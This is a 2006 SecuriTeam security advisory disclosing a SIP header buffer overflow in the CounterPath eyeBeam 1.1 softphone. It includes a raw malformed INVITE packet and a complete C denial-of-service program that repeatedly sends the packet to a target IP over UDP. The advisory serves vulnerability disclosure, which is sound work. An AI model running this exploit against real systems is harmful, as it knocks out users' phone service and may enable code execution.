[NT] CounterPath eyeBeam SIP Buffer Overflow

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



CounterPath eyeBeam SIP Buffer Overflow
------------------------------------------------------------------------


SUMMARY

<http://www.xten.net/index.php?menu=eyeBeam> eyeBeam is a SIP softphone
supporting open standards for VoIP, Video and Instant Messaging.

CounterPath eyeBeam does not handle SIP headers correctly allow attackers
to crash the system and execute arbitrary code using buffer overflow.

DETAILS

Vulnerable Systems:
* eyeBeam version 1.1

A buffer overflow in eyeBeam exists while handing SIP header with a large
field name.

Proof of Concept:
INVITE sip:a@xxxxxxxxx SIP/2.0
Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119
From: 1249 <sip:a@xxxxxxxxx>;tag=1249
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Receiver
<sip:100012@xxxxxxxxxx>
Call-ID: 4166@<172.16.3.6> <--Change it to target IP
CSeq: 18571 INVITE
Expires: 1200
Max-Forwards: 70
Content-Type: application/sdp
Content-Length: 130

v=0
o=1249 1249 1249 IN IP4 127.0.0.1
s=Session SDP
c=IN IP4 127.0.0.1
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000

If an attacker send a packet several times to eyeBeam when it's starting
and have no call operation, then it will crashed for reading an invalid
address which can be controlled by the attacker.

If the attacker sends it several times when it's in a call, then eyeBeam
will not be responsive when dialing or getting calls, and may crash when
writing an address, and my also execute arbitrary code.

Exploit:
/*********************************************************
eyeBeam handling SIP header DOS POC
Author : ZwelL
Email : zwell@xxxxxxxx
Blog : http://www.donews.net/zwell
Data : 2006.1.15
*********************************************************/

#include <stdio.h>
#include "winsock2.h"

#pragma comment(lib, "ws2_32")

char *sendbuf1 =
"INVITE sip:a@xxxxxxxxx SIP/2.0\r\n"
"Via: SIP/2.0/UDP
127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119\r\n"
"From: test <sip:a@xxxxxxxxx>;tag=1249\r\n"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaa: test <sip:a@xxxxxxxxx>\r\n";

char *sendbuf2 =
"CSeq: 18571 INVITE\r\n"
"Expires: 1200\r\n"
"Max-Forwards: 70\r\n"
"Content-Type: application/sdp\r\n"
"Content-Length: 130\r\n"
"\r\n"
"v=0\r\n"
"o=1249 1249 1249 IN IP4 127.0.0.1\r\n"
"s=Session SDP\r\n"
"c=IN IP4 127.0.0.1\r\n"
"t=0 0\r\n"
"m=audio 9876 RTP/AVP 0\r\n"
"a=rtpmap:0 PCMU/8000\r\n";

int main(int argc, char **argv)
{
WSADATA wsaData;
SOCKET sock;
sockaddr_in RecvAddr;
char sendbuf[4096];
int iResult;
int port = 8376; //default is 8376, but SIP's default port is 5060

printf("eyeBeam handling SIP header DOS POC\nAuthor : ZwelL\n");
printf("Email : zwell@xxxxxxxx\nBlog :
http://www.donews.net/zwell\n\n";);
if(argc < 2)
{
printf("Usage : %s <target ip> [port]\n", argv[0]);
return 0;
}

if(argc == 3)
port = atoi(argv[2]);

iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
if (iResult != NO_ERROR)
{
printf("Error at WSAStartup()\n");
return 0;
}

sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

ZeroMemory(&RecvAddr, sizeof(RecvAddr));
RecvAddr.sin_family = AF_INET;
RecvAddr.sin_port = htons((short)port);
RecvAddr.sin_addr.s_addr = inet_addr(argv[1]);

printf("Target is : %s\t port is : %d\r\n", argv[1], port);
for(int i=0; i<20; i++)
{
sprintf(sendbuf, "%sCall-ID: 4166@<%s>\r\n%s", sendbuf1,
argv[1], sendbuf2);
if(SOCKET_ERROR == sendto(sock,
sendbuf,
strlen(sendbuf),
0,
(SOCKADDR *) &RecvAddr,
sizeof(RecvAddr)))
{
printf("sendto wrong:%d\n", WSAGetLastError());
continue;
}
}

printf("Now check the target is crafted?\r\n");

WSACleanup();
return 1;
}

/* EoF */


ADDITIONAL INFORMATION

The information has been provided by <mailto:zwell@xxxxxxxx> ZwelL.
The original article can be found at:
<http://blog.donews.com/zwell/archive/2006/01/17/698810.aspx>
http://blog.donews.com/zwell/archive/2006/01/17/698810.aspx



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages